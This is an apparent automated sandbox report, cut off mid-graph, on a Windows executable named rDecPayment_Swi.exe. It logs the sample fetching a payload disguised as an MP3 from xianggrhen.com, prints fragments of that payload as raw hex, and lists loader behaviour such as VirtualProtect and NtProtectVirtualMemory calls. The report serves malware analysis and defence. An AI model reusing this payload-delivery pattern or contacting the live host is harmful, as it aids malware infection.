                                          Dec 11, 2024 06:01:56.100781918 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.100892067 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.100934982 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.101778984 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.101979017 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.102022886 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.102813005 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.102914095 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.102957010 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.103787899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.103857040 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.103904009 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.104835987 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.104923010 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.104969978 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.105798006 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.105911970 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.105958939 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.106794119 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.106923103 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.106967926 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.107928991 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.157762051 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.247482061 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.247493029 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.247539997 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.247673035 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.247833014 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.247883081 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.248635054 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.248775005 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.248823881 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.249643087 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.249756098 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.249798059 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.250641108 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.250756025 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.250802994 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.251647949 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.251759052 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.251801968 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.252654076 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.252773046 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.252815008 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.253653049 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.253771067 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.253813982 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.254666090 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.254807949 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.254857063 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.255683899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.255769014 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.255810022 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.256696939 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.256827116 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.256867886 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.257730007 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.257872105 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.257917881 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.258692980 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.258807898 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.258852959 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.259696960 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.259803057 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.259849072 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.260685921 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.260788918 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.260833025 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.261692047 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.261806011 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.261852980 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.262693882 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.262813091 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.262862921 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.263703108 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.263828993 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.263878107 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.264708042 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.264823914 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.264870882 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.265703917 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.265820980 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.265862942 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.266725063 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.266828060 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.266872883 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.267762899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.267847061 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.267890930 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.268835068 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.268985987 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.269036055 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.269750118 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.269862890 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.269901991 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.270829916 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.270944118 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.270982027 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.271771908 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.271864891 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.271914005 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.272769928 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.272877932 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.272923946 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.273765087 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.273885965 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.273931026 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.274800062 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.274890900 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.274941921 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.275758028 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.275873899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.275924921 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.276768923 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.276935101 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.276978016 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.277833939 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.277909994 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.277952909 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.278799057 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.278909922 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.278954983 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.279779911 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.279903889 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.279948950 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.280814886 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.280921936 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.280965090 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.281814098 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.281925917 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.281970978 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.282819986 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.282927990 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.282974958 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.283817053 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.283984900 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.284033060 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.284826040 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.284950972 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.284993887 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.285835981 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.285974979 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.286017895 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.286845922 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.286959887 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.287003040 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.287872076 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.287930965 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.287976980 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.288839102 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.288949013 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.288990974 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.289853096 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.289968014 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.290009975 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.290848970 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.290982962 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.291026115 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.291846037 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.291945934 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.291990042 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.292855978 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.292968035 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.293005943 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.293868065 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.293975115 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.294028997 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.294872046 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.294997931 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.295041084 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.295851946 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.295974016 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.296019077 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.296871901 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.296978951 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.297019958 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.297902107 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.297981024 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.298032999 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.298882961 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.298996925 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.299043894 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.299882889 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.345262051 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.439599037 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.439686060 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.439799070 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.440052986 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.440112114 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.440164089 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.441060066 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.485889912 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:59.877895117 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:59.877998114 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:02:25.270215034 CET4971180192.168.2.545.9.191.182

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 11, 2024 06:01:52.218074083 CET5622653192.168.2.51.1.1.1
                                          Dec 11, 2024 06:01:52.546958923 CET53562261.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 11, 2024 06:01:52.218074083 CET192.168.2.51.1.1.10x5d71Standard query (0)xianggrhen.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 11, 2024 06:01:52.546958923 CET1.1.1.1192.168.2.50x5d71No error (0)xianggrhen.com45.9.191.182A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • xianggrhen.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.54971145.9.191.182805064C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 11, 2024 06:01:52.672498941 CET81OUTGET /book/Netnoyfq.mp3 HTTP/1.1
                                          Host: xianggrhen.com
                                          Connection: Keep-Alive
                                          Dec 11, 2024 06:01:53.910396099 CET253INHTTP/1.1 200 OK
                                          etag: "13ec08-675916c6-17cc83;;;"
                                          last-modified: Wed, 11 Dec 2024 04:36:22 GMT
                                          content-type: audio/mpeg
                                          content-length: 1305608
                                          accept-ranges: bytes
                                          date: Wed, 11 Dec 2024 05:01:53 GMT
                                          server: LiteSpeed
                                          connection: Keep-Alive
                                          Dec 11, 2024 06:01:53.910485983 CET1236INData Raw: ee d3 a3 df de 17 e1 e1 32 48 17 2e 36 dd c1 b7 6c 1e 4a 36 f7 0d 4c d8 f2 2c 84 53 ac 31 12 28 fd c9 43 0f f2 07 20 f6 6e d1 6d 12 76 a0 0c 76 5c d0 fd 1d c1 13 17 3d 2a 11 f1 b2 b9 51 a4 83 36 a8 0a 91 e7 08 d5 3f 01 2c 52 7b cc f8 8c 65 0a 87
                                          Data Ascii: 2H.6lJ6L,S1(C nmvv\=*Q6?,R{eCV+Nkj=wX*MU=s4DY,A4Z;#M|f;L[VCdHj~(N8]rY~kpcOZ9MMGs&pLsn><u
                                          Dec 11, 2024 06:01:53.910562992 CET1236INData Raw: 68 8a 1a 42 ac 97 f4 1e ac 50 de 7d 68 09 58 51 1a 28 c8 de 5e 88 86 c1 5f 02 14 5b a2 3c a0 8a ab 9a 17 26 21 fc f8 3d e7 26 5b 09 77 af 5e 73 6d 6e 34 18 50 48 39 85 e5 b2 95 91 61 4f 03 b9 ee e3 5d 9d 98 6e ec 0a 47 c2 9f 28 42 59 6f eb e0 31
                                          Data Ascii: hBP}hXQ(^_[<&!=&[w^smn4PH9aO]nG(BYo1l~h3iH-xfef[HV!/xS5_Q|ZZP)CakLB%dhx<dZU2f];t^\rUnY-<x*-Dw%-1j*
                                          Dec 11, 2024 06:01:53.910576105 CET448INData Raw: 28 7a d3 df 56 14 0d 9f 45 ad e1 83 09 16 31 64 9e 36 1d 97 5f fb 7a ea f0 55 92 73 ac 39 a6 2a 07 5c 9c d1 79 dc 71 78 58 60 1a 94 7b 11 91 84 e7 54 b4 b3 b2 f5 ee 76 77 00 90 9d 6b 3a 05 24 c4 88 3c 74 c2 cf d7 2c 2e 47 d4 ef 00 4a 40 7e 56 5f
                                          Data Ascii: (zVE1d6_zUs9*\yqxX`{Tvwk:$<t,.GJ@~V_t]pEB,<@BA.Gy:M:2IX^TWn:A b(O^9indOsgY4H^eHVfxl%(l*ILppt$HH{u=L+
                                          Dec 11, 2024 06:01:53.910670042 CET1236INData Raw: 3b 76 b6 69 20 7d 6e 04 58 ce 22 60 a3 a4 c9 b5 05 bb 2e 21 13 90 3b aa bd e5 30 7c 63 2b 71 fd de 3d 22 b0 c3 82 ea 21 f8 42 08 e9 32 b0 3c 6d de 63 a5 da aa 2c fb d2 3b 60 08 8e c5 00 83 81 e6 4c 2e 67 3a c3 15 1d 30 de ac 69 55 09 1f a1 4c 91
                                          Data Ascii: ;vi }nX"`.!;0|c+q="!B2<mc,;`L.g:0iUL.}`_ipi$>*&4pP^{ta16e!<9"x60"!G1T]ePm2)hiV,b,cvSK){uaM3auA
                                          Dec 11, 2024 06:01:53.910681009 CET1236INData Raw: de 30 c3 4d 8b 26 e9 71 b8 42 17 0c af e9 27 b9 66 05 01 82 ac 4d c1 07 f6 1e d1 48 1d 0c d0 9f a6 4e 66 c7 56 9f 4d 31 c4 4b 96 5e 5c b4 cd 0d 3d d5 32 a2 af f3 c8 3b 8c a2 98 cf f7 e1 6f 3b 9b a5 16 ea 02 8a 01 36 e0 3f 9d b4 43 9f fa f4 f8 4b
                                          Data Ascii: 0M&qB'fMHNfVM1K^\=2;o;6?CK1 F!360?%R0!+@wrjK(e"h[KWY.a:)ziTlqb@vqnV54QmyqQzyRPHw.z5y0:;S
                                          Dec 11, 2024 06:01:53.910691023 CET1236INData Raw: c3 5e 1c 12 63 bd d2 c0 1b 67 07 a4 db 65 43 e3 0f 89 14 0d f3 af 42 d6 0b e7 b4 cd 0c 7a 89 2e 6d b9 79 24 d1 8d 13 93 24 9b 16 97 0a 44 c7 fc 54 c1 8d 68 76 d2 e9 57 94 fe c0 bd 29 b3 50 43 10 78 18 94 0d c3 a4 5c c1 e4 f2 b9 31 a2 40 bf d6 5d
                                          Data Ascii: ^cgeCBz.my$$DThvW)PCx\1@]c./c#\<y\V``iN}a.Ex YJh:n5Xej|G`1eW|}*=<5@A/j)vLKOnu%KEwNJHjj/smnD<Zx
                                          Dec 11, 2024 06:01:53.910706043 CET1236INData Raw: 23 6b 06 0a 1d 60 84 a6 89 33 8a dd 78 f3 82 f9 54 37 63 52 2b 70 58 0a 16 95 38 fa 35 dc 3c 4f f2 ed 47 61 2a 97 1d b6 93 02 3f 53 8d 73 f6 af 46 8a 38 63 75 15 6d a7 0c 96 43 a2 3c 7d 19 2b 7a 5f 98 8c 19 e6 4a 23 f7 20 41 de 7c fb 05 dc b2 33
                                          Data Ascii: #k`3xT7cR+pX85<OGa*?SsF8cumC<}+z_J# A|38 ]cMX+u699-jJ]huj[lmR 'W^w%eMV5<l=hco:lI,\_)T!yQ^ Q_gv$.c5tt
                                          Dec 11, 2024 06:01:53.910917044 CET1236INData Raw: 64 f7 79 ba 8a 15 a0 94 cd fd 50 12 f1 f0 12 b8 14 ff b2 ff 2e b9 8f 34 02 12 cf a0 cb c0 8b 5c ec c9 d5 04 e0 a9 8b f5 6a 66 ac 9c 9c aa 08 65 a9 dc d8 c9 a4 d7 f4 4e 46 13 7f 24 78 cf 26 65 b4 55 4c 21 d3 df 11 75 c1 23 02 29 da 9e f5 87 f9 51
                                          Data Ascii: dyP.4\jfeNF$x&eUL!u#)QTjNbMzIt-RU^2%x[$$eyoAr>}qQ'(+qG<xr )3]q6A[ mr(xeCb}Nh o\}|c`
                                          Dec 11, 2024 06:01:53.910928011 CET1236INData Raw: 74 20 7d 9d e7 af f4 61 8c 14 db 7a 65 9e 76 57 90 2d 64 d8 70 c6 e7 93 90 17 68 b5 7d 0f 5c 27 b2 cd 6e f9 ee 46 77 16 ee e6 fe 5d d2 66 00 93 d1 27 8b 17 79 39 c0 d1 ba 49 e3 ef 9f d9 48 86 9f 4c 99 76 a8 1c 79 2b 6d 2c ae 9f 95 54 b2 69 29 3b
                                          Data Ascii: t }azevW-dph}\'nFw]f'y9IHLvy+m,Ti);u~Wo.s^Qu65=6`&}vMmDWCp@mQ-=&-\-Io0`tTy,>w-Ypp8av6@4;jbYF2m06})
                                          Dec 11, 2024 06:01:54.030066967 CET1236INData Raw: 02 f3 10 1b 9d 6f d2 e1 da d8 a1 4e 0d 10 d8 35 63 38 1a 50 83 ea 1e 47 a0 6c 94 bb 58 cb e5 5f ef d9 16 2d 09 aa 5b 04 eb f0 ce 1c 2c 49 6a 40 d4 18 26 97 38 0d d2 64 67 82 4b 76 4a 5d 64 ee 33 6b 23 02 0b 62 03 fd 65 5c a9 a8 4e 38 af 74 c8 d0
                                          Data Ascii: oN5c8PGlX_-[,Ij@&8dgKvJ]d3k#be\N8t3^ R$_xZelj%<s_I5CL^$$$KwL}]Ch*+Q#"P,\Fbt5mN-gbjC'"w.RqY!.^'RbLvdW%Z{


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:00:01:50
                                          Start date:11/12/2024
                                          Path:C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\rDecPayment_Swi.exe"
                                          Imagebase:0x9b0000
                                          File size:199'936 bytes
                                          MD5 hash:2091B5FB30DEB2E988E44A7763EF6873
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2335054364.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:00:02:21
                                          Start date:11/12/2024
                                          Path:C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\rDecPayment_Swi.exe"
                                          Imagebase:0x820000
                                          File size:199'936 bytes
                                          MD5 hash:2091B5FB30DEB2E988E44A7763EF6873
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:6
                                          Start time:00:02:22
                                          Start date:11/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1168
                                          Imagebase:0x3f0000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:3.3%
                                            Total number of Nodes:276
                                            Total number of Limit Nodes:6
                                            execution_graph 50748 1161b80 50749 1161b9d 50748->50749 50750 1161bad 50749->50750 50753 1163b1a 50749->50753 50756 1166e17 50749->50756 50760 116f790 50753->50760 50757 1166e36 50756->50757 50759 116f790 VirtualProtect 50757->50759 50758 11623e9 50759->50758 50762 116f7b7 50760->50762 50764 116fc90 50762->50764 50765 116fcd9 VirtualProtect 50764->50765 50767 1163b35 50765->50767 50768 60f12b8 50769 60f12cd 50768->50769 50770 60f12e3 50769->50770 50773 60f3b17 50769->50773 50778 60f3bc6 50769->50778 50774 60f3b26 50773->50774 50784 60f6e14 50774->50784 50788 60f6e20 50774->50788 50779 60f3bcd 50778->50779 50780 60f3b59 50778->50780 50782 60f6e14 CopyFileA 50780->50782 50783 60f6e20 CopyFileA 50780->50783 50781 60f3ba7 50782->50781 50783->50781 50786 60f6e19 CopyFileA 50784->50786 50787 60f6fad 50786->50787 50789 60f6e7c CopyFileA 50788->50789 50791 60f6fad 50789->50791 50792 61514d8 50793 6151527 NtProtectVirtualMemory 50792->50793 50795 615159f 50793->50795 51092 60d86f0 51093 60d8705 51092->51093 51097 60d8721 51093->51097 51102 60d8730 51093->51102 51094 60d871b 51099 60d8726 51097->51099 51098 60d8869 51098->51094 51099->51098 51107 60dc508 51099->51107 51111 60dc500 51099->51111 51104 60d8757 51102->51104 51103 60d8869 51103->51094 51104->51103 51105 60dc508 SleepEx 51104->51105 51106 60dc500 SleepEx 51104->51106 51105->51104 51106->51104 51108 60dc54c SleepEx 51107->51108 51110 60dc5ac 51108->51110 51110->51099 51112 60dc54c SleepEx 51111->51112 51114 60dc5ac 51112->51114 51114->51099 50796 60f7ed0 50797 60f7ee5 50796->50797 50810 60f828d 50797->50810 50813 60f853f 50797->50813 50817 60f7f10 50797->50817 50820 60f7f01 50797->50820 50823 60f7fe3 50797->50823 50826 60f8273 50797->50826 50829 60f7f97 50797->50829 50832 60f8238 50797->50832 50835 60f8169 50797->50835 50838 60f82eb 50797->50838 50841 60f7fed 50797->50841 50811 60f7f6d 50810->50811 50844 60f9478 50811->50844 50814 60f8542 50813->50814 50815 60f7f6d 50813->50815 50816 60f9478 10 API calls 50815->50816 50816->50815 50818 60f7f3a 50817->50818 50819 60f9478 10 API calls 50818->50819 50819->50818 50821 60f7f3a 50820->50821 50822 60f9478 10 API calls 50821->50822 50822->50821 50824 60f7f6d 50823->50824 50825 60f9478 10 API calls 50824->50825 50825->50824 50827 60f7f6d 50826->50827 50828 60f9478 10 API calls 50827->50828 50828->50827 50830 60f7f6d 50829->50830 50831 60f9478 10 API calls 50830->50831 50831->50830 50833 60f7f6d 50832->50833 50834 60f9478 10 API calls 50833->50834 50834->50833 50836 60f7f6d 50835->50836 50837 60f9478 10 API calls 50836->50837 50837->50836 50839 